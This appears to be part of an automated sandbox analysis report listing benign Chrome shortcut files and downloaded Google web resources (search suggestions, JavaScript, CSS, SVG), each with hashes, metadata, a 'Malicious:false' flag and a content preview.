                                                                                                                                                                                                                                                                                                                                    SHA-256:AF0ABA8ACFC2A7ED75BDC7C50A3B398059327D27A56C50EBBD935F50FBD5F4DE
                                                                                                                                                                                                                                                                                                                                    SHA-512:68328F1A5974922050427DB02F52411D9C31C94D0607B23CFC1286AB9DCBB9C6C00654B04438243F3453FDAA63AFAF87ED950B1B3D226B279D451D4F13A3B2A4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....y.Lt`[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.E....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............l.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2693
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.005355478493626
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:8xUdjTLLsHUidAKZdA14tseh7sFiZUkmgqeh7srJy+BX:8xMLNndJy
                                                                                                                                                                                                                                                                                                                                    MD5:F6B8A25B571041D576DB301ECEB4CBAB
                                                                                                                                                                                                                                                                                                                                    SHA1:A1B07C312F60FB46F89A412E2B480EF32B71E29D
                                                                                                                                                                                                                                                                                                                                    SHA-256:FCA41726EBE75966E93DB85A8B0D6D4B6B4240358CA3E6DE12A45A48932B856B
                                                                                                                                                                                                                                                                                                                                    SHA-512:2D819EC6F2556FB2B785740C6103BBE24A0CFC6ECF3EFF08E93646CD72A26E5721B8CC4FE5206A2EDAD6A6F5CE0203F88B2058B4060EFB3812AB27390FDFB3EC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.E....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............l.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 07:46:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9915838618652915
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:8JndjTLLTHUidAKZdA1vehDiZUkwqeh1Jy+R:8JVLvjJy
                                                                                                                                                                                                                                                                                                                                    MD5:49F8C8F4E298043A74828973D5AD0581
                                                                                                                                                                                                                                                                                                                                    SHA1:167EE1728D9FA3219C1DF686D3F748D40D1EE000
                                                                                                                                                                                                                                                                                                                                    SHA-256:F9DDC9F3E271A1B0727EA83751B13830C1F3CE399A02DD0746A5E19E3EC42BFC
                                                                                                                                                                                                                                                                                                                                    SHA-512:BFC17D1FFE8BAF1D5E6B86B2D2EB98896A897B5DD050D8409DAD37B9BE0511A79436748154CF0D03FAE0E01B61560EBCF2C911CAE9E99C5CC9F47020F7EC9F4C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....j.>t`[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.E....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............l.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 07:46:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9818585732242395
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:84djTLLTHUidAKZdA1hehBiZUk1W1qehnJy+C:8ILP9HJy
                                                                                                                                                                                                                                                                                                                                    MD5:F6F7D82F7AF77F67818956CF11401E70
                                                                                                                                                                                                                                                                                                                                    SHA1:73F06822596F31DAD5FF85C46FFBB139EAC60A92
                                                                                                                                                                                                                                                                                                                                    SHA-256:F0BDD92127A058390BB3512417F7BD05B33E5D8E3CBE11C2719193A43B042574
                                                                                                                                                                                                                                                                                                                                    SHA-512:B792D393AC3AB8D35EBC9E64C3A0AF136E4DE6FEE54FB7F9A12E63CA3BD4C3740B418AC2D85479C16B8735F26DF7DFFBF6165ED09D5BEBD8AB9D6EA0F1F22AED
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....Vt`[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.E....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............l.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 07:46:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2683
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9916999627204905
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:8MdjTLLTHUidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbdJy+yT+:80LHT/TbxWOvTbdJy7T
                                                                                                                                                                                                                                                                                                                                    MD5:03A2FEBF7AFC3101B14FE90B265903D9
                                                                                                                                                                                                                                                                                                                                    SHA1:D6759E1B3FABF5C2C2708119D61AF8CE3CB6CA07
                                                                                                                                                                                                                                                                                                                                    SHA-256:DE828EEE515AC52688676B1B0EC5B1BCD1B5F0F7C40470AE65EC077D5E0B0954
                                                                                                                                                                                                                                                                                                                                    SHA-512:E0D032332803DFA6D25725AF03DB771E5C09859A376F17451AA404E53D410F7E69D8907BAB86E47DA777503A83E64C631CA998F8048F16BD98F5F8C3485E8565
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......2t`[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.E....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............l.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2682)
                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2687
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.847845049958818
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:O6vWxwAKlgZ01kiAcH6666mgbVIFu0Nw2E7gxt7O70zF37dVr22yWEAlR6NTMAnP:O6vWKLliOxH6666Nx8VE8nnhrdVr2xEs
                                                                                                                                                                                                                                                                                                                                    MD5:D7BBDC8824E9D6353837E8CEDF787769
                                                                                                                                                                                                                                                                                                                                    SHA1:83AEA8D7C91D88FCF0BC91A84527A912F6CE6337
                                                                                                                                                                                                                                                                                                                                    SHA-256:9E99D295D27E3FCAC77973DECEC97410811452AEF6DE185328A9AF488E5E960C
                                                                                                                                                                                                                                                                                                                                    SHA-512:B9AF41A0EF98A651ABDED18A12853104FD07F73360660862D86420E99D47D5D08F057A06F2CB0C8003F60F18080572B6910C8E644AB13116ABD7A132672DC144
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                                    Preview:)]}'.["",["giant schnauzer wins dog show","dune prophecy episode 7 release date","idaho lottery raffle","t coronae borealis nova","dense fog making people sick","jeopardy winner today","whatsapp 2025","anthony santander"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWYwNm4zOXRuEhZCYXNlYmFsbCByaWdodCBmaWVsZGVyMtsJZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFDNEFRQU1CSWdBQ0VRRURFUUgveEFBYkFBQURBUUVBQXdBQUFBQUFBQUFBQUFBQUJRY0VBd0VHQ1AvRUFDNFFBQUlCQXdRQkFnTUlBd0FBQUFBQUFBRUNBd0FFRVFVU0lUR
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                    Size (bytes):117446
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                                                                                    MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                                                                                    SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                                                                                    SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                                                                                    SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                    Size (bytes):132739
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.436894495003022
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:fXkJQ7O4N5dTm+syHEt4W3XdQ4Q6suSr/nUW2i6o:fCQ7HTt/sHdQ4Q6sDfUW8o
                                                                                                                                                                                                                                                                                                                                    MD5:157AA70E3008526E3B7CD5A7DB602C67
                                                                                                                                                                                                                                                                                                                                    SHA1:3D19491868E54596BB15B41437455BD40C54AB78
                                                                                                                                                                                                                                                                                                                                    SHA-256:4B01F7468BC4C27C2BE62073083DFA2E4D7BEB0AACCC669B3C32F21B18E8763C
                                                                                                                                                                                                                                                                                                                                    SHA-512:BD13E39A83A9A379747FD2FF2CA48407E1DBCFEF93F35412FE73760549AB97355A32D9AFD28DD84E36B0B7F8A746954BFD3D7F35435091AFC6B1D118F6286DDC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                    Size (bytes):175897
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                                                                                                    MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                                                                                                    SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                                                                                                    SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                                                                                                    SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                                                                                                    Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
